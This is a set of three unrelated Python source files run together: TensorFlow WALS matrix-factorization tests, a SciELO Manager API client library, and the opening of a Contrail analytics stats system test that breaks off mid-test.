constant_op.constant(project_row))
if mode == model_fn.ModeKeys.INFER and projection_weights is not None:
weights_batch = input_lib.batch(
projection_weights,
batch_size=batch_size,
capacity=10,
enqueue_many=True)
features[wals_lib.WALSMatrixFactorization.PROJECTION_WEIGHTS] = (
weights_batch)
labels = None
return features, labels
return _fn, nz_row_ids, nz_col_ids
@property
def input_matrix(self):
return self.INPUT_MATRIX
@property
def row_steps(self):
return np.ceil(self._num_rows / self.batch_size)
@property
def col_steps(self):
return np.ceil(self._num_cols / self.batch_size)
@property
def batch_size(self):
return 5
@property
def use_cache(self):
return False
@property
def max_sweeps(self):
return None
def setUp(self):
self._num_rows = 5
self._num_cols = 7
self._embedding_dimension = 3
self._unobserved_weight = 0.1
self._num_row_shards = 2
self._num_col_shards = 3
self._regularization_coeff = 0.01
self._col_init = [
# Shard 0.
[[-0.36444709, -0.39077035, -0.32528427],
[1.19056475, 0.07231052, 2.11834812],
[0.93468881, -0.71099287, 1.91826844]],
# Shard 1.
[[1.18160152, 1.52490723, -0.50015002],
[1.82574749, -0.57515913, -1.32810032]],
# Shard 2.
[[-0.15515432, -0.84675711, 0.13097958],
[-0.9246484, 0.69117504, 1.2036494]],
]
self._row_weights = [[0.1, 0.2, 0.3], [0.4, 0.5]]
self._col_weights = [[0.1, 0.2, 0.3], [0.4, 0.5], [0.6, 0.7]]
# Values of row and column factors after running one iteration or factor
# updates.
self._row_factors_0 = [[0.097689, -0.219293, -0.020780],
[0.50842, 0.64626, 0.22364],
[0.401159, -0.046558, -0.192854]]
self._row_factors_1 = [[1.20597, -0.48025, 0.35582],
[1.5564, 1.2528, 1.0528]]
self._col_factors_0 = [[2.4725, -1.2950, -1.9980],
[0.44625, 1.50771, 1.27118],
[1.39801, -2.10134, 0.73572]]
self._col_factors_1 = [[3.36509, -0.66595, -3.51208],
[0.57191, 1.59407, 1.33020]]
self._col_factors_2 = [[3.3459, -1.3341, -3.3008],
[0.57366, 1.83729, 1.26798]]
self._model = wals_lib.WALSMatrixFactorization(
self._num_rows,
self._num_cols,
self._embedding_dimension,
self._unobserved_weight,
col_init=self._col_init,
regularization_coeff=self._regularization_coeff,
num_row_shards=self._num_row_shards,
num_col_shards=self._num_col_shards,
row_weights=self._row_weights,
col_weights=self._col_weights,
max_sweeps=self.max_sweeps,
use_factors_weights_cache_for_training=self.use_cache,
use_gramian_cache_for_training=self.use_cache)
def test_fit(self):
# Row sweep.
input_fn = self.input_fn(np_matrix=self.input_matrix,
batch_size=self.batch_size,
mode=model_fn.ModeKeys.TRAIN,
remove_empty_rows_columns=True)[0]
self._model.fit(input_fn=input_fn, steps=self.row_steps)
row_factors = self._model.get_row_factors()
self.assertAllClose(row_factors[0], self._row_factors_0, atol=1e-3)
self.assertAllClose(row_factors[1], self._row_factors_1, atol=1e-3)
# Col sweep.
# Running fit a second time will resume training from the checkpoint.
input_fn = self.input_fn(np_matrix=self.input_matrix,
batch_size=self.batch_size,
mode=model_fn.ModeKeys.TRAIN,
remove_empty_rows_columns=True)[0]
self._model.fit(input_fn=input_fn, steps=self.col_steps)
col_factors = self._model.get_col_factors()
self.assertAllClose(col_factors[0], self._col_factors_0, atol=1e-3)
self.assertAllClose(col_factors[1], self._col_factors_1, atol=1e-3)
self.assertAllClose(col_factors[2], self._col_factors_2, atol=1e-3)
def test_predict(self):
input_fn = self.input_fn(np_matrix=self.input_matrix,
batch_size=self.batch_size,
mode=model_fn.ModeKeys.TRAIN,
remove_empty_rows_columns=True,
)[0]
# Project rows 1 and 4 from the input matrix.
proj_input_fn = self.input_fn(
np_matrix=self.INPUT_MATRIX[[1, 4], :],
batch_size=2,
mode=model_fn.ModeKeys.INFER,
project_row=True,
projection_weights=[[0.2, 0.5]])[0]
self._model.fit(input_fn=input_fn, steps=self.row_steps)
projections = self._model.get_projections(proj_input_fn)
projected_rows = list(itertools.islice(projections, 2))
self.assertAllClose(
projected_rows,
[self._row_factors_0[1], self._row_factors_1[1]],
atol=1e-3)
# Project columns 5, 3, 1 from the input matrix.
proj_input_fn = self.input_fn(
np_matrix=self.INPUT_MATRIX[:, [5, 3, 1]],
batch_size=3,
mode=model_fn.ModeKeys.INFER,
project_row=False,
projection_weights=[[0.6, 0.4, 0.2]])[0]
self._model.fit(input_fn=input_fn, steps=self.col_steps)
projections = self._model.get_projections(proj_input_fn)
projected_cols = list(itertools.islice(projections, 3))
self.assertAllClose(
projected_cols,
[self._col_factors_2[0], self._col_factors_1[0],
self._col_factors_0[1]],
atol=1e-3)
def test_eval(self):
    """Check that eval loss matches the training loss after each sweep."""
    # Do a row sweep then evaluate the model on row inputs.
    # The evaluate function returns the loss of the projected rows, but since
    # projection is idempotent, the eval loss must match the model loss.
    input_fn = self.input_fn(np_matrix=self.input_matrix,
                             batch_size=self.batch_size,
                             mode=model_fn.ModeKeys.TRAIN,
                             remove_empty_rows_columns=True,
                             )[0]
    self._model.fit(input_fn=input_fn, steps=self.row_steps)
    # Evaluate one row per step, over all rows.
    eval_input_fn_row = self.input_fn(np_matrix=self.input_matrix,
                                      batch_size=1,
                                      mode=model_fn.ModeKeys.EVAL,
                                      project_row=True,
                                      remove_empty_rows_columns=True)[0]
    loss = self._model.evaluate(
        input_fn=eval_input_fn_row, steps=self._num_rows)['loss']

    with self.cached_session():
        # calculate_loss presumably recomputes the WALS loss from the
        # current factors -- defined outside this view.
        true_loss = self.calculate_loss()

    self.assertNear(
        loss, true_loss, err=.001,
        msg="""After row update, eval loss = {}, does not match the true
loss = {}.""".format(loss, true_loss))

    # Do a col sweep then evaluate the model on col inputs.
    self._model.fit(input_fn=input_fn, steps=self.col_steps)
    eval_input_fn_col = self.input_fn(np_matrix=self.input_matrix,
                                      batch_size=1,
                                      mode=model_fn.ModeKeys.EVAL,
                                      project_row=False,
                                      remove_empty_rows_columns=True)[0]
    loss = self._model.evaluate(
        input_fn=eval_input_fn_col, steps=self._num_cols)['loss']

    with self.cached_session():
        true_loss = self.calculate_loss()

    self.assertNear(
        loss, true_loss, err=.001,
        msg="""After col update, eval loss = {}, does not match the true
loss = {}.""".format(loss, true_loss))
class WALSMatrixFactorizationTestSweeps(WALSMatrixFactorizationTest):
    """Variant of the base test where training stops via max_sweeps."""

    @property
    def max_sweeps(self):
        # Cap training at two sweeps in total.
        return 2

    # We set the column steps to None so that we rely only on max_sweeps to stop
    # training.
    @property
    def col_steps(self):
        return None
class WALSMatrixFactorizationTestCached(WALSMatrixFactorizationTest):
    """Variant of the base test with input caching enabled."""

    @property
    def use_cache(self):
        return True
# NOTE(review): "Factorizaiont" is a typo for "Factorization". The class is
# still collected by the test runner, so the rename is cosmetic, but it
# should be fixed together with any external references.
class WALSMatrixFactorizaiontTestPaddedInput(WALSMatrixFactorizationTest):
    """Variant of the base test whose input has an empty first row/column."""

    # Input matrix with one all-zero row and one all-zero column prepended.
    PADDED_INPUT_MATRIX = np.pad(
        WALSMatrixFactorizationTest.INPUT_MATRIX,
        [(1, 0), (1, 0)], mode='constant')

    @property
    def input_matrix(self):
        return self.PADDED_INPUT_MATRIX
class WALSMatrixFactorizationUnsupportedTest(test.TestCase):
    """Checks that distributed (multi-worker) training is rejected."""

    def setUp(self):
        pass

    def testDistributedWALSUnsupported(self):
        # Simulate a distributed TF_CONFIG: 2 parameter servers + 2 workers,
        # with this task being worker 1.
        tf_config = {
            'cluster': {
                run_config_lib.TaskType.PS: ['host1:1', 'host2:2'],
                run_config_lib.TaskType.WORKER: ['host3:3', 'host4:4']
            },
            'task': {
                'type': run_config_lib.TaskType.WORKER,
                'index': 1
            }
        }
        with test.mock.patch.dict('os.environ',
                                  {'TF_CONFIG': json.dumps(tf_config)}):
            config = run_config.RunConfig()
            self.assertEqual(config.num_worker_replicas, 2)
            # Constructing the estimator with more than one worker replica
            # must raise, since distributed WALS is unsupported.
            with self.assertRaises(ValueError):
                self._model = wals_lib.WALSMatrixFactorization(1, 1, 1, config=config)
class SweepHookTest(test.TestCase):
    """Verifies that _SweepHook runs the correct ops on each training step."""

    def test_sweeps(self):
        # State the hook reads/writes, plus one boolean "done" variable per
        # op so the test can observe which ops the hook actually ran.
        is_row_sweep_var = variables.Variable(True)
        is_sweep_done_var = variables.Variable(False)
        init_done = variables.Variable(False)
        row_prep_done = variables.Variable(False)
        col_prep_done = variables.Variable(False)
        row_train_done = variables.Variable(False)
        col_train_done = variables.Variable(False)

        init_op = state_ops.assign(init_done, True)
        row_prep_op = state_ops.assign(row_prep_done, True)
        col_prep_op = state_ops.assign(col_prep_done, True)
        row_train_op = state_ops.assign(row_train_done, True)
        col_train_op = state_ops.assign(col_train_done, True)
        train_op = control_flow_ops.no_op()
        # switch_op emulates the estimator's transition between sweeps:
        # clear the sweep-done flag and flip the row/col direction.
        switch_op = control_flow_ops.group(
            state_ops.assign(is_sweep_done_var, False),
            state_ops.assign(is_row_sweep_var,
                             math_ops.logical_not(is_row_sweep_var)))
        mark_sweep_done = state_ops.assign(is_sweep_done_var, True)

        with self.cached_session() as sess:
            sweep_hook = wals_lib._SweepHook(
                is_row_sweep_var,
                is_sweep_done_var,
                init_op,
                [row_prep_op],
                [col_prep_op],
                row_train_op,
                col_train_op,
                switch_op)
            mon_sess = monitored_session._HookedSession(sess, [sweep_hook])
            sess.run([variables.global_variables_initializer()])

            # Row sweep: first step must run init, row prep and row train,
            # and must NOT switch direction yet (sweep not marked done).
            mon_sess.run(train_op)
            self.assertTrue(sess.run(init_done),
                            msg='init op not run by the Sweephook')
            self.assertTrue(sess.run(row_prep_done),
                            msg='row_prep_op not run by the SweepHook')
            self.assertTrue(sess.run(row_train_done),
                            msg='row_train_op not run by the SweepHook')
            self.assertTrue(
                sess.run(is_row_sweep_var),
                msg='Row sweep is not complete but is_row_sweep_var is False.')

            # Col sweep: mark the row sweep done, then the next step should
            # switch to columns and run the col prep/train ops.
            mon_sess.run(mark_sweep_done)
            mon_sess.run(train_op)
            self.assertTrue(sess.run(col_prep_done),
                            msg='col_prep_op not run by the SweepHook')
            self.assertTrue(sess.run(col_train_done),
                            msg='col_train_op not run by the SweepHook')
            self.assertFalse(
                sess.run(is_row_sweep_var),
                msg='Col sweep is not complete but is_row_sweep_var is True.')

            # Row sweep again: completing the col sweep flips back to rows.
            mon_sess.run(mark_sweep_done)
            mon_sess.run(train_op)
            self.assertTrue(
                sess.run(is_row_sweep_var),
                msg='Col sweep is complete but is_row_sweep_var is False.')
class StopAtSweepHookTest(test.TestCase):
    """Verifies that _StopAtSweepHook requests a stop at the target sweep."""

    def test_stop(self):
        hook = wals_lib._StopAtSweepHook(last_sweep=10)
        # The hook looks the counter up by this well-known variable name.
        completed_sweeps = variables.Variable(
            8, name=wals_lib.WALSMatrixFactorization.COMPLETED_SWEEPS)
        train_op = state_ops.assign_add(completed_sweeps, 1)
        hook.begin()

        with self.cached_session() as sess:
            sess.run([variables.global_variables_initializer()])
            mon_sess = monitored_session._HookedSession(sess, [hook])
            mon_sess.run(train_op)
            # completed_sweeps is 9 after running train_op.
            self.assertFalse(mon_sess.should_stop())
            mon_sess.run(train_op)
            # completed_sweeps is 10 after running train_op.
            self.assertTrue(mon_sess.should_stop())
# Standard script entry point: run all test cases in this module.
if __name__ == '__main__':
    test.main()
| |
# coding: utf-8
import re
import logging
import time
import functools
from . import httpbroker
from . import exceptions
logger = logging.getLogger(__name__)
ITEMS_PER_REQUEST = 50  # page size used while iterating over collections
API_VERSIONS = ('v1',)  # api versions this client knows how to talk to
# Matches resource urls like `/api/v1/journals/70/`:
# groups are (version, endpoint, resource_id).
RESOURCE_PATH_PATTERN = re.compile(r'/api/(\w+)/(\w+)/(\d+)/')


class Connector(object):
    """
    Encapsulates the HTTP requests layer.

    :param username: valid username that has access to manager.scielo.org.
    :param api_key: its respective api key.
    :param api_uri: (optional) if connecting to a non official instance of `SciELO Manager <https://github.com/scieloorg/SciELO-Manager>`_
    :param version: (optional) by default the newest version is used.
    :param http_broker: (optional) a module to deal with http stuff. The reference API is implemented at :mod:`scieloapi.httpbroker`.
    :param check_ca: (optional) if certification authority should be checked during ssl sessions. Defaults to `False`.
    """
    # Caches endpoint definitions, keyed by api version. Class-level on
    # purpose: the definitions are shared by all Connector instances.
    _cache = {}

    def __init__(self, username, api_key, api_uri=None,
                 version=None, http_broker=None, check_ca=False):
        # Dependencies are kept injectable so tests can supply fakes.
        self._time = time
        _httpbroker = http_broker if http_broker else httpbroker  # module

        # setup
        self.check_ca = check_ca
        self.api_uri = api_uri if api_uri else r'http://manager.scielo.org/api/'

        if version:
            if version in API_VERSIONS:
                self.version = version
            else:
                raise ValueError('unsupported api version. supported are: %s' % ', '.join(API_VERSIONS))
        else:
            # Default to the newest supported version.
            self.version = sorted(API_VERSIONS)[-1]

        self.username = username
        self.api_uri = self.api_uri + self.version + '/'

        # dynamic http methods creation
        self._create_http_methods(_httpbroker, username, api_key)

    def _create_http_methods(self, broker, username, api_key):
        """
        Dynamically adds http methods bound to user credentials.

        :param broker: reference to the module to be used as http broker.
        :param username: valid username that has access to manager.scielo.org.
        :param api_key: its respective api key.
        """
        bound_get = functools.partial(broker.get, auth=(username, api_key),
                                      check_ca=self.check_ca)
        bound_post = functools.partial(broker.post, auth=(username, api_key),
                                       check_ca=self.check_ca)

        setattr(self, '_http_get', bound_get)
        setattr(self, '_http_post', bound_post)

    def fetch_data(self, endpoint,
                   resource_id=None,
                   **kwargs):
        """
        Fetches the specified resource from the SciELO Manager API.

        Transient failures (connection errors, service unavailable) are
        retried up to 10 times with a linearly growing backoff.

        :param endpoint: a valid endpoint at http://manager.scielo.org/api/v1/
        :param resource_id: (optional) an int representing the document.
        :param \*\*kwargs: (optional) params to be passed as query string.
        """
        err_count = 0
        while True:
            try:
                response = self._http_get(self.api_uri,
                                          endpoint=endpoint,
                                          resource_id=resource_id,
                                          params=kwargs)
            except (exceptions.ConnectionError, exceptions.ServiceUnavailable) as e:
                if err_count < 10:
                    # Linear backoff: 5s, 10s, ... The previous code used
                    # `err_count * 5`, which made the very first retry wait
                    # 0 seconds and hammer the server immediately.
                    wait_secs = (err_count + 1) * 5
                    logger.info('%s. Waiting %ss to retry.' % (e, wait_secs))
                    self._time.sleep(wait_secs)
                    err_count += 1
                else:
                    logger.error('%s. Unable to connect to resource.' % e)
                    raise
            else:
                return response

    def iter_docs(self, endpoint, **kwargs):
        """
        Iterates over all documents of a given endpoint and collection.

        :param endpoint: must be a valid endpoint at http://manager.scielo.org/api/v1/
        :param \*\*kwargs: are passed thru the request as query string params

        Note that you need a valid API KEY in order to query the
        Manager API. Read more at: http://ref.scielo.org/ddkpmx
        """
        offset = 0
        qry_params = {'limit': ITEMS_PER_REQUEST}
        qry_params.update(kwargs)

        while True:
            qry_params.update({'offset': offset})
            doc = self.fetch_data(endpoint, **qry_params)

            for obj in doc['objects']:
                # we are interested only in non-trashed items.
                if obj.get('is_trashed'):
                    continue
                yield obj

            if not doc['meta']['next']:
                # End the generator with a plain `return`. The previous
                # `raise StopIteration()` becomes a RuntimeError inside
                # generators since PEP 479 (Python 3.7+).
                return
            else:
                offset += ITEMS_PER_REQUEST

    def get_endpoints(self):
        """
        Get all endpoints available for the given API version.

        The result is memoized in the class-level ``_cache``, keyed by api
        version, so the server is contacted at most once per version.
        """
        cls = self.__class__
        if self.version not in cls._cache:
            cls._cache[self.version] = self._http_get(self.api_uri)

        return cls._cache[self.version]

    def post_data(self, endpoint, data):
        """
        Creates a new resource at `endpoint` with `data`.

        :param endpoint: must be a valid endpoint at http://manager.scielo.org/api/v1/
        :param data: json serializable Python datastructures.
        :returns: created resource url.
        """
        return self._http_post(self.api_uri, data, endpoint=endpoint)
class Endpoint(object):
    """
    Object-oriented handle for a single API endpoint.

    :param name: the endpoint name.
    :param connector: instance of :class:`Connector`.
    """

    def __init__(self, name, connector):
        self.name = name
        self.connector = connector

    def get(self, resource_id):
        """
        Fetch a single document from this endpoint.

        :param resource_id: an int representing the document.
        """
        return self.connector.fetch_data(self.name, resource_id=resource_id)

    def all(self):
        """
        Iterate over every document of this endpoint.
        """
        # Equivalent to filtering with no criteria.
        return self.filter()

    def filter(self, **kwargs):
        """
        Iterate over the documents that satisfy some criteria.

        :param \*\*kwargs: filtering criteria as documented at `docs.scielo.org <http://ref.scielo.org/ph6gvk>`_
        """
        return self.connector.iter_docs(self.name, **kwargs)

    def post(self, data):
        """
        Create a new resource on this endpoint.

        :param data: serializable python data structures.
        :returns: id of the new resource.
        """
        resource_url = self.connector.post_data(self.name, data)
        match = RESOURCE_PATH_PATTERN.search(resource_url)
        if match is None:
            raise exceptions.APIError('Unknown url: %s' % resource_url)
        # The third capture group of RESOURCE_PATH_PATTERN is the numeric id.
        return match.group(3)
class Client(object):
    """
    Collection of :class:`Endpoint` made available in an object oriented fashion.

    An instance of Client tries to figure out the available endpoints
    for the version of the API the Client is instantiated for, and
    automatically instantiates :class:`Endpoint` for each one.
    If ``version`` is missing, the newest available will be used.

    :param username: valid username that has access to manager.scielo.org.
    :param api_key: its respective api key.
    :param api_uri: (optional) if connecting to a non official instance of `SciELO Manager <https://github.com/scieloorg/SciELO-Manager>`_
    :param version: (optional) by default the newest version is used.
    :param check_ca: (optional) if certification authority should be checked during ssl sessions. Defaults to `False`.

    Usage::

        >>> import scieloapi
        >>> cli = scieloapi.Client('some.user', 'some.apikey')
        <scieloapi.scieloapi.Client object at 0x10726f9d0>
        >>> cli.query('journals').all()
        <generator object iter_docs at 0x10fd59730>
    """
    def __init__(self, username, api_key, api_uri=None,
                 version=None, connector_dep=Connector, check_ca=False):
        # `connector_dep` is injectable to allow tests to pass a fake.
        self._connector = connector_dep(username,
                                        api_key,
                                        api_uri=api_uri,
                                        version=version,
                                        check_ca=check_ca)

        # One Endpoint instance per endpoint discovered on the server.
        self._endpoints = {}
        for ep in self._introspect_endpoints():
            self._endpoints[ep] = Endpoint(ep, self._connector)

    def _introspect_endpoints(self):
        """
        Contact the API server to discover the available endpoints.
        """
        return self._connector.get_endpoints().keys()

    def __getattr__(self, name):
        """
        Missing attributes are assumed to be endpoint lookups.
        i.e. Client.journals.all()
        """
        if name in self._endpoints:
            logger.warning('DEPRECATION WARNING! Use the `query` method for endpoint lookups.')
            return self._endpoints[name]
        else:
            raise AttributeError()

    @property
    def endpoints(self):
        """
        Lists all available endpoints for the api version
        the instance of :class:`Client` was created to interact.
        """
        return self._endpoints.keys()

    @property
    def version(self):
        """
        The API version the Client instance is interfacing with.
        """
        return self._connector.version

    def fetch_relations(self, dataset, only=None):
        """
        Fetches all records that relates to `dataset`.

        Its important to note that only first-level relations will be fetched
        in order to avoid massive data retrieval.

        :param dataset: datastructure representing a record. Tipically a `dict` instance.
        :param only: (optional) a collection of relations to fetch. By default, all relations are retrieved.

        Usage::

            >>> import scieloapi
            >>> cli = scieloapi.Client('some.user', 'some.apikey')
            >>> cli.fetch_relations(cli.journals.get(70))
        """
        new_dataset = {}

        for attr_name, attr_value in dataset.items():
            # skip fetching itself and undesired fields
            if attr_name == 'resource_uri' or (only and attr_name not in only):
                new_dataset[attr_name] = attr_value
            # NOTE(review): `basestring` is Python 2 only; this method needs
            # porting (e.g. to `str`) before the module can run on Python 3.
            elif isinstance(attr_value, basestring):
                try:
                    new_dataset[attr_name] = self.get(attr_value)
                except ValueError as e:
                    # Not a resource uri; keep the raw value unchanged.
                    new_dataset[attr_name] = attr_value
            elif isinstance(attr_value, list):
                # Fetch each element that looks like a resource uri, keeping
                # anything that cannot be resolved as-is.
                new_elems = []
                for elem in attr_value:
                    try:
                        new_elems.append(self.get(elem))
                    except (TypeError, ValueError) as e:
                        new_elems.append(elem)
                new_dataset[attr_name] = new_elems
            else:
                new_dataset[attr_name] = attr_value

        return new_dataset

    def get(self, resource_uri):
        """
        Gets resource_uri.

        Gets the given resource in a opinionated fashion in terms of the
        `version` passed during client's instantiation. The `endpoint` must also
        be available for the version the client is bound to.

        :param resource_uri: text string in the form `/api/<version>/<endpoint>/<resource_id>/`.
        """
        match = RESOURCE_PATH_PATTERN.match(resource_uri)
        if match:
            version, endpoint, resource_id = match.groups()
            if version != self.version:
                raise ValueError('Resource and Client version must match')

            return self.query(endpoint).get(resource_id)
        else:
            raise ValueError('Invalid resource_uri')

    def query(self, endpoint):
        """
        Query an endpoint.

        :param endpoint: string of the endpoint's name. A complete list of
        valid endpoints can be got at :attr:`Client.endpoints`.
        """
        if endpoint in self._endpoints:
            return self._endpoints[endpoint]
        else:
            raise ValueError('Unknown endpoint %s.' % endpoint)
| |
#!/usr/bin/env python
#
# Copyright (c) 2014 Juniper Networks, Inc. All rights reserved.
#
#
# analytics_stattest.py
#
# System tests for analytics
#
import os
import sys
import threading
# HACK: replace _DummyThread's private __stop with a no-op. Presumably this
# silences errors raised for dummy threads on interpreter shutdown when
# gevent monkey-patching is active -- TODO confirm it is still needed.
threading._DummyThread._Thread__stop = lambda x: 42
import signal
import gevent
from gevent import monkey
# Monkey-patch the stdlib for cooperative concurrency *before* the imports
# below create any sockets or threads.
monkey.patch_all()
import os  # NOTE(review): duplicate of the `import os` above; harmless.
import unittest
import testtools
import fixtures
import socket
from utils.analytics_fixture import AnalyticsFixture
from utils.stats_fixture import StatsFixture
from mockcassandra import mockcassandra
from mockredis import mockredis
import logging
import time
import pycassa
from pycassa.pool import ConnectionPool
from pycassa.columnfamily import ColumnFamily
from opserver.sandesh.viz.constants import *
from utils.opserver_introspect_utils import VerificationOpsSrv
from utils.util import retry, find_buildroot, redis_path

logging.basicConfig(level=logging.INFO,
                    format='%(asctime)s %(levelname)s %(message)s')

# Root of the build tree, resolved from the current working directory.
builddir = find_buildroot(os.getcwd())
class StatsTest(testtools.TestCase, fixtures.TestWithFixtures):
    """System tests for the analytics stats query path.

    Each test brings up the analytics stack (redis, vizd, opserver, qed)
    against class-level mock cassandra/redis instances, sends test stat
    samples through a generator fixture, and queries them back via the
    query engine.
    """

    @classmethod
    def setUpClass(cls):
        if StatsTest._check_skip_test() is True:
            return

        # The build tree's libraries must be on the loader path; abort
        # early otherwise (DYLD_* covers the OS X case).
        if (os.getenv('LD_LIBRARY_PATH', '').find('build/lib') < 0):
            if (os.getenv('DYLD_LIBRARY_PATH', '').find('build/lib') < 0):
                assert(False)

        # Shared mock cassandra/redis instances for all tests in the class.
        cls.cassandra_port = StatsTest.get_free_port()
        mockcassandra.start_cassandra(cls.cassandra_port)
        cls.redis_port = StatsTest.get_free_port()
        mockredis.start_redis(
            cls.redis_port, redis_path())

    @classmethod
    def tearDownClass(cls):
        if StatsTest._check_skip_test() is True:
            return

        mockcassandra.stop_cassandra(cls.cassandra_port)
        mockredis.stop_redis(cls.redis_port)
        pass

    #@unittest.skip('Get samples using StatsOracle')
    def test_00_basicsamples(self):
        '''
        This test starts redis,vizd,opserver and qed
        It uses the test class' cassandra instance
        Then it sends test stats to the collector
        and checks if they can be accessed from QE.
        '''
        logging.info("*** test_00_basicsamples ***")
        if StatsTest._check_skip_test() is True:
            return True

        vizd_obj = self.useFixture(
            AnalyticsFixture(logging, builddir,
                             self.__class__.redis_port,
                             self.__class__.cassandra_port))
        assert vizd_obj.verify_on_setup()
        assert vizd_obj.verify_collector_obj_count()
        collectors = [vizd_obj.get_collector()]

        generator_obj = self.useFixture(
            StatsFixture("VRouterAgent", collectors,
                         logging, vizd_obj.get_opserver_port()))
        assert generator_obj.verify_on_setup()

        # NOTE: UTCTimestampUsec presumably comes from the star import of
        # opserver.sandesh.viz.constants -- verify.
        logging.info("Starting stat gen " + str(UTCTimestampUsec()))
        # Samples deliberately include '&' and '>' to exercise escaping.
        generator_obj.send_test_stat_dynamic("t00","samp1",1,1);
        generator_obj.send_test_stat_dynamic("t00","samp2",2,1.1);
        generator_obj.send_test_stat_dynamic("t00&t01","samp1&samp2",2,1.1);
        generator_obj.send_test_stat_dynamic("t00>t01>","samp1&samp2",2,1.1,
                                             "&test_s2>");

        logging.info("Checking Stats " + str(UTCTimestampUsec()))
        assert generator_obj.verify_test_stat("StatTable.TestStateDynamic.ts",
            "-2m", select_fields = [ "UUID", "ts.s1", "ts.i1", "ts.d1" ],
            where_clause = 'name="t00"', num = 2, check_rows =
            [{ "ts.s1":"samp2", "ts.i1":2, "ts.d1":1.1},
             { "ts.s1":"samp1", "ts.i1":1, "ts.d1":1}]);

        assert generator_obj.verify_test_stat("StatTable.TestStateDynamic.ts",
            "-2m", select_fields = [ "UUID", "ts.s1", "ts.s2" ],
            where_clause = 'name="t00&t01"', num = 1, check_rows =
            [{ "ts.s1":"samp1&samp2", "ts.s2": "" }])

        assert generator_obj.verify_test_stat("StatTable.TestStateDynamic.ts",
            "-2m", select_fields = [ "UUID", "name", "ts.s2" ],
            where_clause = 'ts.s1="samp1&samp2"', num = 2, check_rows =
            [{ "name":"t00&t01", "ts.s2": "" },
             { "name":"t00>t01>", "ts.s2":"&test_s2>" }])
        return True
    # end test_00_basicsamples

    #@unittest.skip('Get samples using StatsOracle')
    def test_01_statprefix(self):
        '''
        This test starts redis,vizd,opserver and qed
        It uses the test class' cassandra instance
        Then it sends test stats to the collector
        and checks if they can be accessed from QE, using prefix-suffix indexes
        '''
        logging.info("*** test_01_statprefix ***")
        if StatsTest._check_skip_test() is True:
            return True

        vizd_obj = self.useFixture(
            AnalyticsFixture(logging, builddir,
                             self.__class__.redis_port,
                             self.__class__.cassandra_port))
        assert vizd_obj.verify_on_setup()
        assert vizd_obj.verify_collector_obj_count()
        collectors = [vizd_obj.get_collector()]

        generator_obj = self.useFixture(
            StatsFixture("VRouterAgent", collectors,
                         logging, vizd_obj.get_opserver_port()))
        assert generator_obj.verify_on_setup()

        logging.info("Starting stat gen " + str(UTCTimestampUsec()))
        generator_obj.send_test_stat("t010","lxxx","samp1",1,1);
        generator_obj.send_test_stat("t010","lyyy","samp1",2,2);
        generator_obj.send_test_stat("t010","lyyy","samp3",2,2,"",5);
        generator_obj.send_test_stat("t010","lyyy&","samp3>",2,2,"");
        generator_obj.send_test_stat("t011","lyyy","samp2",1,1.1,"",7);
        generator_obj.send_test_stat("t011","lxxx","samp2",2,1.2);
        generator_obj.send_test_stat("t011","lxxx","samp2",2,1.2,"",9);
        generator_obj.send_test_stat("t010&t011","lxxx","samp2",1,1.4);
        generator_obj.send_test_stat("t010&t011","lx>ly","samp2",1,1.4);

        # Queries below use the composite (prefix|suffix) where-clause form.
        logging.info("Checking Stats str-str " + str(UTCTimestampUsec()))
        assert generator_obj.verify_test_stat("StatTable.StatTestState.st","-2m",
            select_fields = [ "UUID", "st.s1", "st.i1", "st.d1" ],
            where_clause = 'name|st.s1=t010|samp1', num = 2, check_rows =
            [{ "st.s1":"samp1", "st.i1":2, "st.d1":2},
             { "st.s1":"samp1", "st.i1":1, "st.d1":1}]);

        assert generator_obj.verify_test_stat("StatTable.StatTestState.st",
            "-2m", select_fields = [ "UUID", "l1" ], where_clause =
            'name|st.s1=t010&t011|samp2 OR name|st.s1=t010|samp3>',
            num = 3, check_rows = [{ "l1":"lxxx" }, { "l1":"lx>ly" },
            { "l1":"lyyy&" }])

        assert generator_obj.verify_test_stat("StatTable.StatTestState.st","-2m",
            select_fields = [ "UUID", "st.s1", "st.i1", "st.d1" ],
            where_clause = 'st.i1|st.i2=2|1<6', num = 1, check_rows =
            [{ "st.s1":"samp3", "st.i1":2, "st.d1":2}]);

        logging.info("Checking CLASS " + str(UTCTimestampUsec()))
        assert generator_obj.verify_test_stat("StatTable.StatTestState.st","-2m",
            select_fields = [ "T", "name", "l1", "CLASS(T)" ],
            where_clause = 'name=*', num = 9, check_uniq =
            { "CLASS(T)":7 })
        return True
    # end test_01_statprefix

    #@unittest.skip('Get samples using StatsOracle')
    def test_02_overflowsamples(self):
        '''
        This test starts redis,vizd,opserver and qed
        It uses the test class' cassandra instance
        Then it sends test stats to the collector
        and checks if they can be accessed from QE.
        '''
        logging.info("*** test_02_overflowsamples ***")
        if StatsTest._check_skip_test() is True:
            return True

        vizd_obj = self.useFixture(
            AnalyticsFixture(logging, builddir,
                             self.__class__.redis_port,
                             self.__class__.cassandra_port))
        assert vizd_obj.verify_on_setup()
        assert vizd_obj.verify_collector_obj_count()
        collectors = [vizd_obj.get_collector()]

        generator_obj = self.useFixture(
            StatsFixture("VRouterAgent", collectors,
                         logging, vizd_obj.get_opserver_port()))
        assert generator_obj.verify_on_setup()

        logging.info("Starting stat gen " + str(UTCTimestampUsec()))
        # Max uint64 value: exercises integer overflow handling end-to-end.
        generator_obj.send_test_stat_dynamic("t02","samp02-2",0xffffffffffffffff,1.1);

        logging.info("Checking Stats " + str(UTCTimestampUsec()))
        assert generator_obj.verify_test_stat("StatTable.TestStateDynamic.ts",
            "-2m", select_fields = [ "UUID", "ts.s1", "ts.i1", "ts.d1" ],
            where_clause = 'name="t02"', num = 1, check_rows =
            [{"ts.s1":"samp02-2", "ts.i1":0xffffffffffffffff, "ts.d1":1.1}])
        return True
    # end test_02_overflowsamples

    #@unittest.skip('Get minmax values from inserted stats')
    def test_03_min_max_query(self):
        '''
        This test starts redis,vizd,opserver and qed
        It uses the test class' cassandra instance
        Then it inserts into the stat table rows
        and queries MAX and MIN on them
        '''
        logging.info("*** test_03_min_max_query ***")
        if StatsTest._check_skip_test() is True:
            return True

        vizd_obj = self.useFixture(
            AnalyticsFixture(logging, builddir,
                             self.__class__.redis_port,
                             self.__class__.cassandra_port))
        assert vizd_obj.verify_on_setup()
        assert vizd_obj.verify_collector_obj_count()
        collectors = [vizd_obj.get_collector()]

        generator_obj = self.useFixture(
            StatsFixture("VRouterAgent", collectors,
                         logging, vizd_obj.get_opserver_port()))
        assert generator_obj.verify_on_setup()

        logging.info("Starting stat gen " + str(UTCTimestampUsec()))
        generator_obj.send_test_stat("t04","lxxx","samp1",1,5);
